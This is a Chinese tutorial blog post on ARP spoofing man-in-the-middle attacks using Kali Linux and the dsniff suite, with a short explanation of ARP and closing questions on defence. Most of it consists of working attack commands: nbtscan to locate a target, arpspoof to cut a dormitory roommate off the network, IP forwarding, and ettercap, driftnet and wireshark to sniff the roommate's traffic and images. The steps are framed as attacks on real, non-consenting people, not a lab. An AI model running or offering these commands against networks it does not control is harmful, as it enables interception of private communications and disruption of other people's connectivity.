天天看點

中間人攻擊之ARP欺騙

作者:合天網安實驗室

x00、軟體安裝及環境搭建

第一步、Kali下載下傳導入

Kali下載下傳位址(VMware版本):

https://images.kali.org/virtual-images/kali-linux-2020.4-vmware-amd64.7z           

解壓後,打開VMware,

中間人攻擊之ARP欺騙
中間人攻擊之ARP欺騙

【——全網最全的網絡安全學習資料包分享給愛學習的你,關注我,私信回複“領取”擷取——】

1.網絡安全多個方向學習路線

2.全網最全的CTF入門學習資料

3.一線大佬實戰經驗分享筆記

4.網安大廠面試題合集

5.紅藍對抗實戰技術秘籍

6.網絡安全基礎入門、Linux、web安全、滲透測試方面視訊

第二步、Dsniff套件安裝

Dsniff是一個基于unix系統網絡嗅探工具。

Dsniff是一個工具集,主要分為四類:

  1. 純粹被動地進行網絡活動監視的工具,包括:dsniff、filesnarf、mailsnarf 、msgsnarf、urlsnarf、webspy;
  2. 針對SSH和SSL的MITM(Man-In-The-Middle)"攻擊"工具,包括sshmitm和webmitm;
  3. 發起主動欺騙的工具,包括:arpspoof、dnsspoof、macof;
  4. 其它工具,包括tcpkill、tcpnice。

kali@kali:~#sudo apt-get update #更新軟體清單

kali@kali:~# sudo apt-get install dsniff #從軟體清單中下載下傳安裝dsniff

中間人攻擊之ARP欺騙

測試是否安裝成功

中間人攻擊之ARP欺騙

我們發現其實運作這個軟體和權限是息息相關的,我們切換root運作

中間人攻擊之ARP欺騙

涉及到的軟體都能夠正常運作(本文僅僅涉及到arpspoof)

中間人攻擊之ARP欺騙

0x01、場景一(讓宿舍室友斷網)

中間人攻擊之ARP欺騙

第一步、找到室友的ip

NBTSCAN可以擷取到PC的真實IP位址和MAC位址。

nbtscan -r 192.168.10.17/24

中間人攻擊之ARP欺騙

第二步、讓他斷網

arpspoof -i 網卡 -t 目标IP 網關

arpspoof -i eth0 -t 192.168.8.213 192.168.8.1

中間人攻擊之ARP欺騙
中間人攻擊之ARP欺騙

#0x02、場景二(監控室友網絡)

第一步、開啟ip轉發功能(讓他上網)

為使受害者主機的資料包能夠順利收發,我們需在Kali Linux中開啟IP轉發功能

A、開啟:echo 1 > /proc/sys/net/ipv4/ip_forward;

中間人攻擊之ARP欺騙

第二步、開啟流量嗅探工具

driftnet 用于抓取網絡流量中的圖檔,并将他們顯示出來。ettercap是一個基于ARP位址欺騙方式的網絡嗅探工具,主要适用于交換區域網路絡。

apt-get install driftnet //安裝driftnet工具

ettercap -Tq -i eth0 //-T是僅使用文本GUI,-q不顯示資料内容,-i是指定網卡

driftnet -i eth0 //選擇監聽端口為eth0

wireshark

中間人攻擊之ARP欺騙
中間人攻擊之ARP欺騙

0x03、場景三(實戰案例介紹)

中間人攻擊之ARP欺騙
中間人攻擊之ARP欺騙
中間人攻擊之ARP欺騙

0x04、原理分析

第一步、ARP請求

中間人攻擊之ARP欺騙
中間人攻擊之ARP欺騙

第二步、ARP響應

中間人攻擊之ARP欺騙
中間人攻擊之ARP欺騙

前提知識:

  1. ARP是幹啥的?

Arp是位址解析協定,通過ip擷取mac位址的協定(同網段才能擷取)

2.為啥要擷取mac位址?

表面上我們看到的是通過ip進行通信,實際上區域網路都是通過mac位址進行通信,

0x05、思考題

ARP攻擊應用場景?

ARP攻擊應該如何防護?

繼續閱讀